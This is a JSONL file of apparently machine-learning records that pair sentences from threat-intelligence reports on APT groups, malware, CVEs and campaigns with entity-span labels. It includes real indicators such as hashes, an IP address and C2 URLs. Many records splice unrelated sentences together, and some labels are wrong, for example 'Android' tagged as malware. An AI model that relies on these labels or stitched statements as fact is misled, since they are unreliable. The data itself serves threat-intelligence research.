{"text": "The function “ NvStart ” is similar to the main function of the older module ; it creates a window and enters the message loop waiting for device arrival notifications .", "spans": {}, "info": {"id": "cyberner_stix_valid_000374", "source": "cyberner_stix_valid"}}
{"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user ’s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": {"Malware: KopiLuwak": [[21, 30]], "Malware: malware": [[155, 162]]}, "info": {"id": "cyberner_stix_valid_000375", "source": "cyberner_stix_valid"}}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": {"Organization: high-tech": [[165, 174]], "Organization: government services": [[177, 196]], "Organization: media": [[199, 204]], "Organization: financial services industries": [[209, 238]], "Organization: Symantec": [[388, 396]]}, "info": {"id": "cyberner_stix_valid_000376", "source": "cyberner_stix_valid"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {"Organization: government officials": [[28, 48]], "Malware: malicious Microsoft Word document": [[90, 123]], "Vulnerability: CVE-2012-0158": [[143, 156]], "Organization: SOC personnel": [[237, 250]]}, "info": {"id": "cyberner_stix_valid_000377", "source": "cyberner_stix_valid"}}
{"text": "What is Chrysaor ? Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan . APT33 : 192.119.15.39 remote-server.ddns.net . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"Malware: Chrysaor": [[8, 16]], "Indicator: 192.119.15.39": [[182, 195]], "Indicator: remote-server.ddns.net": [[196, 218]]}, "info": {"id": "cyberner_stix_valid_000378", "source": "cyberner_stix_valid"}}
{"text": "Due to the current absence of maintained and supported Android banking Malware-as-a-Service in the underground community , there is a certainly demand for a new service . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"Malware: Android": [[55, 62]], "Malware: Daserf": [[462, 468]], "Malware: malware": [[469, 476]], "Vulnerability: exploits": [[508, 516]]}, "info": {"id": "cyberner_stix_valid_000379", "source": "cyberner_stix_valid"}}
{"text": "Data collectors : dump all existing content on the device into a queue . This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . Winnti : a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . The file ’s name consists of six randomly - generated alphanumeric characters .", "spans": {"Organization: military": [[174, 182]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[266, 329]]}, "info": {"id": "cyberner_stix_valid_000380", "source": "cyberner_stix_valid"}}
{"text": "It does so using the Services , Broadcast Receivers , and Activities components of the Android platform . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": {"System: Android": [[87, 94]], "Organization: security industry": [[288, 305]]}, "info": {"id": "cyberner_stix_valid_000381", "source": "cyberner_stix_valid"}}
{"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": {"Organization: government agencies": [[164, 183]]}, "info": {"id": "cyberner_stix_valid_000382", "source": "cyberner_stix_valid"}}
{"text": "It ’ s even possible to send log messages via SMS to the attacker ’ s number . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne . We found roughly 500 domain names that lead or have led to the “ Pig network ” between 2015 to March 2017 .", "spans": {"Malware: 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne": [[210, 289]]}, "info": {"id": "cyberner_stix_valid_000383", "source": "cyberner_stix_valid"}}
{"text": "Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government ’s targets , as well as its objectives and the activities designed to further them .", "spans": {}, "info": {"id": "cyberner_stix_valid_000384", "source": "cyberner_stix_valid"}}
{"text": "Infrastructure The infrastructure supporting this malware is rather complex . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"Organization: Trend Micro": [[92, 103]], "Malware: W2KM_DLOADR.UHAOEEN": [[137, 156]], "Indicator: myapp.exe": [[243, 252]]}, "info": {"id": "cyberner_stix_valid_000385", "source": "cyberner_stix_valid"}}
{"text": "] ponethus [ . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": {"Malware: exploit code": [[28, 40]], "System: WordPress site": [[550, 564]]}, "info": {"id": "cyberner_stix_valid_000386", "source": "cyberner_stix_valid"}}
{"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently .", "spans": {"System: Android": [[75, 82]], "Organization: Google": [[110, 116]], "System: Play Store": [[130, 140]], "Malware: BISCUIT": [[416, 423]]}, "info": {"id": "cyberner_stix_valid_000387", "source": "cyberner_stix_valid"}}
{"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data .", "spans": {}, "info": {"id": "cyberner_stix_valid_000388", "source": "cyberner_stix_valid"}}
{"text": "ZeroT remained the primary stage 1 payload , but the stage 2 payloads varied .", "spans": {"Malware: ZeroT": [[0, 5]]}, "info": {"id": "cyberner_stix_valid_000389", "source": "cyberner_stix_valid"}}
{"text": "The only other publicly used name for the threat actor that we are aware of is “ APT29 ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000390", "source": "cyberner_stix_valid"}}
{"text": "While all of the earlier toolsets – GeminiDuke , PinchDuke , and CosmicDuke – were designed around a core infostealer component , MiniDuke is centered on a simplistic backdoor component whose purpose is to enable the remote execution of commands on the compromised system .", "spans": {"Malware: GeminiDuke": [[36, 46]], "Malware: PinchDuke": [[49, 58]], "Malware: CosmicDuke": [[65, 75]], "Malware: MiniDuke": [[130, 138]]}, "info": {"id": "cyberner_stix_valid_000391", "source": "cyberner_stix_valid"}}
{"text": "Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2 .", "spans": {"Malware: Cannon": [[0, 6]], "Malware: Zebrocy": [[58, 65]]}, "info": {"id": "cyberner_stix_valid_000392", "source": "cyberner_stix_valid"}}
{"text": "Samples uploaded to VirusTotal To encourage further research in the security community , we ’ ve uploaded these sample Chrysaor apps to Virus Total . FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Winnti : xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"Organization: VirusTotal": [[20, 30]], "Malware: Chrysaor": [[119, 127]], "Organization: Virus Total": [[136, 147]], "Organization: FireEye": [[150, 157]], "Indicator: xigncodeservice.com": [[336, 355]], "Indicator: https://namu.wiki/w/XIGNCODE": [[376, 404]]}, "info": {"id": "cyberner_stix_valid_000393", "source": "cyberner_stix_valid"}}
{"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions . Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time . The same “ Tran Duy Linh ” Microsoft Word Exploit Kit was used in delivery of this backdoor . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"Organization: Microsoft": [[283, 292]], "System: organization 's VPN infrastructure": [[432, 466]]}, "info": {"id": "cyberner_stix_valid_000394", "source": "cyberner_stix_valid"}}
{"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": {}, "info": {"id": "cyberner_stix_valid_000395", "source": "cyberner_stix_valid"}}
{"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer . The China-backed BARIUM APT is suspected to be at the helm of the project . The code then tries to kill each process and service that belongs to the following list of AV products : Symantec B-TOOL S-IDTY Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes . The name of the shortcut file , depending on the campaign , is either randomly generated by a random string generator function or hardcoded in the macro code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000396", "source": "cyberner_stix_valid"}}
{"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": {"Malware: EventBot": [[33, 41]], "Malware: TajMahal": [[199, 207]]}, "info": {"id": "cyberner_stix_valid_000397", "source": "cyberner_stix_valid"}}
{"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . The samples we identified target the ATM vendor Diebold .", "spans": {"Malware: VBS file": [[114, 122]], "Malware: INI file": [[130, 138]], "Indicator: samples": [[145, 152]], "Organization: ATM vendor Diebold": [[178, 196]]}, "info": {"id": "cyberner_stix_valid_000398", "source": "cyberner_stix_valid"}}
{"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code . Researchers have linked the group with low confidence to APT33 and APT34 .", "spans": {"Malware: Clayslide delivery documents": [[245, 273]]}, "info": {"id": "cyberner_stix_valid_000399", "source": "cyberner_stix_valid"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": {"Malware: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]], "Organization: ESET": [[84, 88]], "Indicator: Okrum": [[101, 106]]}, "info": {"id": "cyberner_stix_valid_000400", "source": "cyberner_stix_valid"}}
{"text": "Check Point reached out to the Google Security team immediately with information on this campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . Before continuing , Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"Organization: Check Point": [[0, 11]], "Organization: Google Security": [[31, 46]], "Organization: bank": [[273, 277]], "Organization: Adobe Acrobat": [[480, 493]]}, "info": {"id": "cyberner_stix_valid_000401", "source": "cyberner_stix_valid"}}
{"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version . The document attached to this e-mail exploits CVE-2012-0158 . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": {"Vulnerability: e-mail exploits": [[137, 152]], "Vulnerability: CVE-2012-0158": [[153, 166]], "Organization: political": [[262, 271]]}, "info": {"id": "cyberner_stix_valid_000402", "source": "cyberner_stix_valid"}}
{"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": {"Organization: users": [[300, 305]]}, "info": {"id": "cyberner_stix_valid_000403", "source": "cyberner_stix_valid"}}
{"text": "WICKED SPIDER has been observed targeting technology companies in Germany , Indonesia , the Russian Federation , South Korea , Sweden , Thailand , Turkey , the United States , and elsewhere . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"Organization: technology companies": [[42, 62]], "Vulnerability: exploits": [[251, 259]], "Malware: Carberp": [[277, 284]], "Malware: JHUHUGIT downloaders": [[291, 311]]}, "info": {"id": "cyberner_stix_valid_000404", "source": "cyberner_stix_valid"}}
{"text": "The following is a review of scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target , with SHA256 digest : ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5Upon installation , the app uses known framaroot exploits to escalate privileges and break Android 's application sandbox . Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . A string identifying a campaign . Systems are compromised to enable them to then attack other systems .", "spans": {"Malware: Chrysaor": [[53, 61]], "Organization: Samsung": [[107, 114]], "System: Android": [[307, 314]], "Organization: defense contractors": [[473, 492]]}, "info": {"id": "cyberner_stix_valid_000405", "source": "cyberner_stix_valid"}}
{"text": "Write a new file “ %LOCAL_APPDATA%\\dllhost.exe ” or “ %TEMP%\\dllhost.exe ” and execute it , then delete the file , Write a new file “ %LOCAL_APPDATA%\\sechost.dll ” or “ %TEMP%\\sechost.dll ” and call its first exported function using “ rundll32.exe ” or Windows API , then delete the file , Run shellcode provided by the server in a new thread While processing the commands , the backdoor logs all errors and execution results .", "spans": {"Indicator: %LOCAL_APPDATA%\\dllhost.exe": [[19, 46]], "Indicator: %TEMP%\\dllhost.exe": [[54, 72]], "Indicator: %LOCAL_APPDATA%\\sechost.dll": [[134, 161]], "Indicator: %TEMP%\\sechost.dll": [[169, 187]], "Indicator: rundll32.exe": [[235, 247]], "System: Windows": [[253, 260]]}, "info": {"id": "cyberner_stix_valid_000406", "source": "cyberner_stix_valid"}}
{"text": "However , over the last nine campaigns since Trend Micro‘s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"Organization: Trend Micro‘s": [[45, 58]], "Malware: .DLL variant": [[247, 259]], "Vulnerability: exploit": [[315, 322]], "Vulnerability: CVE-2014-6332": [[323, 336]]}, "info": {"id": "cyberner_stix_valid_000407", "source": "cyberner_stix_valid"}}
{"text": "The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {}, "info": {"id": "cyberner_stix_valid_000408", "source": "cyberner_stix_valid"}}
{"text": "Backdoor.SH.SHELLBOT.AA : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d .", "spans": {"Malware: Backdoor.SH.SHELLBOT.AA": [[0, 23]], "Indicator: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[26, 90]]}, "info": {"id": "cyberner_stix_valid_000409", "source": "cyberner_stix_valid"}}
{"text": "The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool .", "spans": {"Malware: Zebrocy": [[4, 11]]}, "info": {"id": "cyberner_stix_valid_000410", "source": "cyberner_stix_valid"}}
{"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 . The first check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution . Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": {"Vulnerability: zero - day": [[545, 555]]}, "info": {"id": "cyberner_stix_valid_000411", "source": "cyberner_stix_valid"}}
{"text": "All contain the same Visual Basic macro code and author name as Honeybee . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": {"Indicator: Ursnif": [[151, 157]], "Indicator: Urlzone": [[162, 169]]}, "info": {"id": "cyberner_stix_valid_000412", "source": "cyberner_stix_valid"}}
{"text": "CNIIHM officially collaborates with other national technology and development organizations , including :", "spans": {"Organization: CNIIHM": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000413", "source": "cyberner_stix_valid"}}
{"text": "Either method to load HenBox ultimately results in an instance of a service being launched . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"Malware: HenBox": [[22, 28]], "Malware: SPLM": [[269, 273]], "Malware: CHOPSTICK": [[276, 285]], "Malware: XAgent": [[288, 294]]}, "info": {"id": "cyberner_stix_valid_000414", "source": "cyberner_stix_valid"}}
{"text": "When the attacker restarts the Quasar application , our uploaded “ dnsapi.dll ” will instead be loaded .", "spans": {"Malware: Quasar": [[31, 37]], "Indicator: dnsapi.dll": [[67, 77]]}, "info": {"id": "cyberner_stix_valid_000415", "source": "cyberner_stix_valid"}}
{"text": "EventBot is in constant development , as seen with the botnetID string above , which shows consecutive numbering across versions . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": {"Malware: EventBot": [[0, 8]], "Organization: Arbor": [[259, 264]], "Malware: Panda Banker": [[335, 347]]}, "info": {"id": "cyberner_stix_valid_000416", "source": "cyberner_stix_valid"}}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]], "Organization: Symantec": [[193, 201]], "Malware: Trojan.Naid": [[265, 276]], "Indicator: Backdoor.Moudoor": [[281, 297]], "Malware: Aurora": [[316, 322]]}, "info": {"id": "cyberner_stix_valid_000417", "source": "cyberner_stix_valid"}}
{"text": "This newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . Name SHA256 . \" The server was used to distribute and infect victims with an upgraded version of Rising Sun with SSL capabilities , \" informs a report shared with BleepingComputer .", "spans": {"Malware: XLoader": [[37, 44]], "Organization: media organizations": [[269, 288]], "System: BleepingComputer": [[528, 544]]}, "info": {"id": "cyberner_stix_valid_000418", "source": "cyberner_stix_valid"}}
{"text": "Health_insurance_registration.doc : 1b5e33e5a244d2d67d7a09c4ccf16e56 . job_titles.doc : fa72c068361c05da65bf2117db76aaa8 . job_titles_itworx.doc : 43fad2d62bc23ffdc6d301571135222c . job_titles_mci.doc : ce25f1597836c28cf415394fb350ae93 .", "spans": {"Indicator: Health_insurance_registration.doc": [[0, 33]], "Indicator: 1b5e33e5a244d2d67d7a09c4ccf16e56": [[36, 68]], "Indicator: job_titles.doc": [[71, 85]], "Indicator: fa72c068361c05da65bf2117db76aaa8": [[88, 120]], "Indicator: job_titles_itworx.doc": [[123, 144]], "Indicator: 43fad2d62bc23ffdc6d301571135222c": [[147, 179]], "Indicator: job_titles_mci.doc": [[182, 200]], "Indicator: ce25f1597836c28cf415394fb350ae93": [[203, 235]]}, "info": {"id": "cyberner_stix_valid_000419", "source": "cyberner_stix_valid"}}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"Malware: archive": [[14, 21]], "Vulnerability: vulnerability": [[82, 95]], "Organization: Kaspersky Lab": [[161, 174]]}, "info": {"id": "cyberner_stix_valid_000420", "source": "cyberner_stix_valid"}}
{"text": "Look for information about the status of your device . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": {"Malware: files": [[59, 64]], "Vulnerability: Microsoft Office vulnerability": [[88, 118]], "Vulnerability: CVE-2012-0158": [[121, 134]], "Organization: CTU": [[364, 367]]}, "info": {"id": "cyberner_stix_valid_000421", "source": "cyberner_stix_valid"}}
{"text": "] 6 2020-03-26 http : //rxc.rxcoordinator [ . These campaign-related VPSs are located in South Africa . MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": {"Organization: Sasakawa Peace Foundation": [[234, 259]], "Organization: White House": [[268, 279]]}, "info": {"id": "cyberner_stix_valid_000422", "source": "cyberner_stix_valid"}}
{"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": {"Malware: CORESHELL": [[97, 106]], "Malware: SPLM": [[109, 113]], "Malware: Xagent": [[120, 126]], "Malware: CHOPSTICK": [[133, 142]], "Malware: JHUHUGIT": [[147, 155]], "Malware: Carberp": [[192, 199]], "Malware: AZZY": [[212, 216]], "Malware: ADVSTORESHELL": [[223, 236]], "Malware: NETUI": [[239, 244]], "Malware: EVILTOSS": [[247, 255]]}, "info": {"id": "cyberner_stix_valid_000423", "source": "cyberner_stix_valid"}}
{"text": "“ As part of our ongoing efforts to protect users from the Ghost Push family of malware , we ’ ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall. ” We are very encouraged by the statement Google shared with us addressing the issue . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 . the application will perform distinct layers of code analysis and optimization , Mandiant attributed these intrusions to UNC4899 , a Democratic People 's Republic of Korea ( DPRK)-nexus actor , with a history of targeting companies within the cryptocurrency vertical .", "spans": {"Malware: Ghost Push family": [[59, 76]], "System: Android": [[172, 179]], "Organization: Google": [[241, 247]], "Organization: employees": [[387, 396]]}, "info": {"id": "cyberner_stix_valid_000424", "source": "cyberner_stix_valid"}}
{"text": "MuddyWater is a well-known threat actor group founded by Iran . “ that has been active since 2017 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000425", "source": "cyberner_stix_valid"}}
{"text": "The archive also contained all the necessary codes to target Australian financial institutions . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . Derusbi is a backdoor B-MAL S-MAL Trojan E-MAL believed to be used among a small group of attackers , which includes the Rancor group . Open - source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": {"Malware: Derusbi": [[208, 215]], "Malware: Trojan E-MAL": [[242, 254]]}, "info": {"id": "cyberner_stix_valid_000427", "source": "cyberner_stix_valid"}}
{"text": "This campaign has most likely been created to allow the targeting of people linked to or interested by cybersecurity , so probably the people who are more sensitive to cybersecurity threats .", "spans": {}, "info": {"id": "cyberner_stix_valid_000428", "source": "cyberner_stix_valid"}}
{"text": "Adobe independently patched the vulnerability ( CVE-2015-3043 ) in APSB15-06 .", "spans": {"Vulnerability: CVE-2015-3043": [[48, 61]]}, "info": {"id": "cyberner_stix_valid_000429", "source": "cyberner_stix_valid"}}
{"text": "The code to load the main module dynamically can also be seen statically . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": {"Malware: wsc_proxy.exe": [[137, 150]], "Malware: wsc.dll": [[201, 208]], "Malware: unsophisticated tools": [[260, 281]]}, "info": {"id": "cyberner_stix_valid_000430", "source": "cyberner_stix_valid"}}
{"text": "It is also able to move code execution into different locations if needed . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks . Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": {"Indicator: a045939f53c5ad2c0f7368b082aa7b0bd7b116da": [[363, 403]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[404, 467]]}, "info": {"id": "cyberner_stix_valid_000431", "source": "cyberner_stix_valid"}}
{"text": "More data is appearing daily , leading us to believe the actors are still highly active . The malware is distributed primarily through laced spam emails that lure recipients into opening attachments . WEBC2 backdoors are often packaged with spear phishing emails . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": {"Malware: WEBC2 backdoors": [[201, 216]], "System: Digital certificates": [[265, 285]], "Organization: Tibetan and Uyghur activists": [[360, 388]]}, "info": {"id": "cyberner_stix_valid_000432", "source": "cyberner_stix_valid"}}
{"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": {"Organization: Arab": [[264, 268]], "Organization: Emirates": [[269, 277]]}, "info": {"id": "cyberner_stix_valid_000433", "source": "cyberner_stix_valid"}}
{"text": "The following code shows EventBot parsing instructions sent from the C2 . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"Malware: EventBot": [[25, 33]], "Malware: UMBRAGE": [[74, 81]], "Indicator: HTA files": [[272, 281]]}, "info": {"id": "cyberner_stix_valid_000434", "source": "cyberner_stix_valid"}}
{"text": "What is most significant about the July 2015 CloudDuke campaign is the timeline .", "spans": {"Malware: CloudDuke": [[45, 54]]}, "info": {"id": "cyberner_stix_valid_000435", "source": "cyberner_stix_valid"}}
{"text": "Figure 6 : Targeted ad network Figure 7 : Injection example After all of the required changes , “ Agent Smith ” compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"Malware: Agent Smith": [[98, 109]], "Malware: AmmyyService.exe": [[346, 362]], "Malware: AmmyySvc.exe": [[366, 378]], "Indicator: msiexec.exe": [[490, 501]]}, "info": {"id": "cyberner_stix_valid_000436", "source": "cyberner_stix_valid"}}
{"text": "Use of macro code that triggers only on user intervention ( to bypass sandbox analysis ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000437", "source": "cyberner_stix_valid"}}
{"text": "Figure 1 – Phishing Email When the email link is opened from an Android device , an APK file ( Fattura002873.apk ) , is downloaded . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora . They rely on a Griffon JS backdoor and Cobalt S-MAL/Meterpreter , and in recent attacks , Powershell Empire . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": {"System: Android": [[64, 71]], "Organization: civil society": [[262, 275]], "Organization: diaspora": [[280, 288]], "Malware: Griffon": [[306, 313]]}, "info": {"id": "cyberner_stix_valid_000438", "source": "cyberner_stix_valid"}}
